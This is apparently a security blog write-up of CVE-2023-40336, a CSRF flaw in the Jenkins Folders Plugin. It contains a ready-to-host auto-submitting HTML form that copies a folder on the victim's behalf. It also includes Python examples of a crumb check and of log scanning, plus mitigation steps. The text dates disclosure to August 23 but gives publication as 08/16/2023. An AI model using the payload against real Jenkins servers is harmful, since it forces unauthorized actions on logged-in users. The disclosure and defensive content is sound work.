On August 23, 2023, a new vulnerability was disclosed affecting Jenkins, the popular open-source automation server. Registered as CVE-2023-40336, this security flaw exists in the Folders Plugin (version 6.846.v23698686ff6 and earlier) and lets attackers exploit Cross-Site Request Forgery (CSRF) to copy entire project folders without proper authorization. In this deep-dive, let’s break down how this CSRF bug works, walk through a sample exploit, and discuss how you can keep your Jenkins safe.

What is a CSRF Vulnerability?

CSRF lets bad actors trick authenticated users into performing requests they didn’t intend. In Jenkins, if you’re logged in and visit a malicious site, that site can make the Jenkins server process requests as if they were coming from you.

About the Jenkins Folders Plugin

The Folders Plugin helps Jenkins admins organize projects into folders. The plugin’s _folder copying_ feature is supposed to be protected from unauthorized use — but it turns out, that protection was missing!

Here’s what was missing: critical CSRF protection (a security token or “crumb”) for the “Copy” folder action.

How Does The Exploit Work?

Suppose an admin (or anyone with permission) is logged into Jenkins. An attacker can trick them into visiting a malicious website. This site silently sends a crafted POST request to Jenkins _on their behalf_, causing a folder to be copied.

Example exploit using plain HTML and JavaScript:

<!-- Save this as exploit.html and host it somewhere -->
<html>
  <body>
    <h1>Attack in progress...</h1>
    <form id="csrf" action="https://your-jenkins-instance/job/important-folder/doCopy" method="POST">
      <input type="hidden" name="name" value="copy-of-important-folder">
      <input type="hidden" name="Submit" value="OK">
    </form>
    <script>
      document.getElementById("csrf").submit();
    </script>
  </body>
</html>

> Note: Change your-jenkins-instance and important-folder to match your setup.

How it works:
The browser sends a POST to Jenkins to trigger a folder copy, _even though the user never meant to_; Jenkins fails to validate that this action was intentional (since no CSRF crumb/token is required).
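To make the missing check concrete, here is an added Python model (not code from the original post or from the Jenkins project) of a folder-copy handler with and without a session-bound CSRF crumb. `Request`, `CrumbIssuer` and the two `handle_copy_*` functions are assumptions made for this example; the field name `Jenkins-Crumb` follows Jenkins' default crumb field, and the requests fed to the handlers are constructed.

```python
"""Added illustration (not code from the original post or from the Jenkins
project): a minimal model of the CSRF "crumb" check that a state-changing
endpoint such as the folder-copy action needs. Request, CrumbIssuer and the
two handle_copy_* functions are assumptions made for this example, not the
plugin's real code."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional, Tuple


@dataclass
class Request:
    method: str
    path: str
    session_id: str                 # the logged-in session the browser's cookie identifies
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


class CrumbIssuer:
    """Derives a per-session token from a server secret and checks it in constant time."""

    def __init__(self, server_secret: Optional[bytes] = None):
        self.secret = server_secret or secrets.token_bytes(32)

    def issue(self, session_id: str) -> str:
        return hmac.new(self.secret, session_id.encode(), hashlib.sha256).hexdigest()

    def verify(self, session_id: str, crumb: Optional[str]) -> bool:
        return bool(crumb) and hmac.compare_digest(self.issue(session_id), crumb)


def handle_copy_vulnerable(req: Request) -> Tuple[int, str]:
    """The flawed pattern: any request carrying a valid session cookie is acted on,
    so a form submitted from another site (cookie attached automatically) succeeds."""
    if not req.session_id:
        return 403, "not logged in"
    return 200, f"copied {req.path} as {req.form.get('name')}"


def handle_copy_fixed(req: Request, issuer: CrumbIssuer) -> Tuple[int, str]:
    """Hardened pattern: require POST and a crumb bound to the caller's session.
    A cross-site page can make the browser send the cookie, but cannot read the
    crumb (same-origin policy), so it cannot include one."""
    if req.method != "POST":
        return 405, "POST required"
    if not req.session_id:
        return 403, "not logged in"
    crumb = req.form.get("Jenkins-Crumb") or req.headers.get("Jenkins-Crumb")
    if not issuer.verify(req.session_id, crumb):
        return 403, "no valid crumb was included in the request"
    return 200, f"copied {req.path} as {req.form.get('name')}"


def demo() -> dict:
    """Runs the cross-site form from the post and a legitimate UI request through both handlers."""
    issuer = CrumbIssuer(b"constructed-server-secret")
    # Constructed: the attacker page's auto-submitted form. The victim's session
    # cookie rides along, but no crumb does.
    cross_site = Request("POST", "/job/important-folder/doCopy", "sess-42",
                         form={"name": "copy-of-important-folder", "Submit": "OK"},
                         headers={"Origin": "https://attacker.example"})
    # Constructed: the same action submitted by the Jenkins UI, which embeds the crumb.
    legit = Request("POST", "/job/important-folder/doCopy", "sess-42",
                    form={"name": "copy-of-important-folder",
                          "Jenkins-Crumb": issuer.issue("sess-42")})
    # Constructed: a bare link-style GET, which a hardened endpoint must refuse outright.
    via_get = Request("GET", "/job/important-folder/doCopy", "sess-42")
    return {
        "vulnerable_cross_site": handle_copy_vulnerable(cross_site)[0],   # 200: copy happens
        "fixed_cross_site": handle_copy_fixed(cross_site, issuer)[0],     # 403: no crumb
        "fixed_legit": handle_copy_fixed(legit, issuer)[0],               # 200
        "fixed_get": handle_copy_fixed(via_get, issuer)[0],               # 405
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

The point of the model is the asymmetry it relies on: the browser attaches the session cookie to any form post, whatever page submitted it, while the crumb is only readable by pages on the Jenkins origin. A handler that checks only the cookie (the vulnerable version) therefore cannot tell the two apart; one that also demands a session-bound crumb and refuses GET can.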

References

- CVE-2023-40336 NVD entry
- Jenkins Security Advisory 2023-08-23
- Jenkins Folders Plugin

What’s The Real Danger?

This isn’t remote code execution, but attackers could use it together with other exploits (for example, copying and modifying jobs to escalate attacks, steal info, or disrupt workflows). Jenkins is often used in CI/CD pipelines, so unauthorized copying could have knock-on effects throughout an organization.

1. Update Now: Upgrade to the Jenkins Folders Plugin version released after 6.846.v23698686ff6.
2. Restrict Access: Make sure your Jenkins isn’t internet-exposed or accessible to untrusted networks.
3. Review Security Settings: Enable the CSRF crumb requirement for all actions. In Jenkins' global config, search for “Prevent Cross Site Request Forgery exploits”.

Wrap Up

CVE-2023-40336 highlights how even a single missing security check can undermine a strong system like Jenkins. If you use the Folders Plugin, update ASAP, check your logs for suspicious folder copies, and make sure CSRF protection is enforced everywhere.
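As an added example of the log review suggested above (not code from the original post or from the Jenkins project), the following Python scans access log lines for folder-copy requests that did not arrive as a POST from a page on your own Jenkins origin. It assumes NCSA "combined" lines with a Referer field and that `JENKINS_ORIGIN` is set to your instance; the `SAMPLE_LOG` entries are constructed for the example.

```python
"""Added example (not from the original post or the Jenkins project): flag
folder-copy requests in an access log that did not come from the Jenkins UI.
Assumes NCSA "combined" log lines (ip ident user [time] "req" status bytes
"referer" "user-agent") and that JENKINS_ORIGIN is your own instance.
SAMPLE_LOG is constructed for the example."""
import re
from urllib.parse import urlsplit

JENKINS_ORIGIN = "https://your-jenkins-instance"   # assumption: set to your instance's origin

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The folder-copy endpoint named in the post; the path may carry a query string.
COPY_PATH = re.compile(r"^/job/[^?]+/doCopy(?:\?|$)")

SAMPLE_LOG = [  # constructed lines, not real traffic
    '203.0.113.7 - alice [23/Aug/2023:10:01:12 +0000] "GET /job/important-folder/ HTTP/1.1" 200 5120 "https://your-jenkins-instance/" "Mozilla/5.0"',
    '203.0.113.7 - alice [23/Aug/2023:10:02:30 +0000] "POST /job/important-folder/doCopy HTTP/1.1" 302 0 "https://attacker.example/" "Mozilla/5.0"',
    '198.51.100.4 - bob [23/Aug/2023:10:05:01 +0000] "POST /job/team-folder/doCopy HTTP/1.1" 302 0 "https://your-jenkins-instance/job/team-folder/" "Mozilla/5.0"',
    '203.0.113.9 - carol [23/Aug/2023:10:07:45 +0000] "GET /job/other-folder/doCopy?name=x HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def origin_of(url: str):
    """Scheme+host of a Referer value, or None when it is absent ("-")."""
    if not url or url == "-":
        return None
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def suspicious_copies(lines):
    """Return copy requests that were not a POST from a page on JENKINS_ORIGIN."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not COPY_PATH.match(m["path"]):
            continue
        reasons = []
        if m["method"] != "POST":           # state-changing action reached via a plain link
            reasons.append(f"state-changing action via {m['method']}")
        ref_origin = origin_of(m["referer"])
        if ref_origin is None:              # referrer suppressed: cannot show it came from the UI
            reasons.append("no Referer")
        elif ref_origin != JENKINS_ORIGIN:  # form submitted from another site
            reasons.append(f"cross-site Referer {ref_origin}")
        if reasons:
            findings.append({"user": m["user"], "ts": m["ts"], "path": m["path"],
                             "status": m["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in suspicious_copies(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['user']} {hit['path']} -> {'; '.join(hit['reasons'])}")
```

Referer is a heuristic, not proof: browsers trim it to the bare origin on cross-site posts and it can be absent altogether, which is why a missing Referer is reported rather than ignored. Treat hits as leads to confirm against who actually created the copied folder, and rely on the crumb requirement for prevention.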

Further Reading

- What is CSRF? (OWASP)
- Securing Jenkins

Credit:
This post is an original write-up based on public advisories and security best practices. Want more breakdowns like this? Leave a comment below!

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 18:43:00 UTC